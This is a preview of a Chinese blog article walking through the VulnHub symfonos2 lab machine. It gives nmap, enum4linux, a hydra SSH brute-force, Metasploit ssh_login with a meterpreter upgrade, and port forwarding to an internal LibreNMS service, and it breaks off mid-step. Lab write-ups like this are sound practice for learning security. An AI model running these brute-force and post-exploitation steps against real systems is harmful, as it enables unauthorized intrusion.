今天看啥  ›  专栏  ›  云计算和网络安全技术实践

vulnhub之symfonos2的实践

云计算和网络安全技术实践  · 公众号  ·  · 2024-09-03 08:06

文章预览

本周实践的是vulnhub的symfonos2镜像, 下载地址,https://download.vulnhub.com/symfonos/symfonos2.7z, 用workstation导入成功, console上直接能看到靶机的ip地址,192.168.88.137, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.137, 发现靶机开了22端口的ssh服务、139/445端口的smb服务, 对smb服务进行扫描,enum4linux 192.168.88.137, 获取到用户aeolus, 进行ssh暴破,hydra -l aeolus -P /usr/share/wordlists/rockyou.txt 192.168.88.137 ssh,获取到密码sergioteamo, 上msfconsole, use auxiliary/scanner/ssh/ssh_login set rhosts 192.168.88.137 set username aeolus set password sergioteamo exploit 转成meterpreter的shell,sessions -u 1, 进入meterpreter的shell,sessions 2, 查看靶机开放端口,netstat,获取到127.0.0.1:8080, 为本地kali攻击机做个端口转发, portfwd add -l 1234 -p 8080 -r 127.0.0.1, 浏览器访问http://localhost:1234,获取到LibreNMS服务, 将meterpre ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览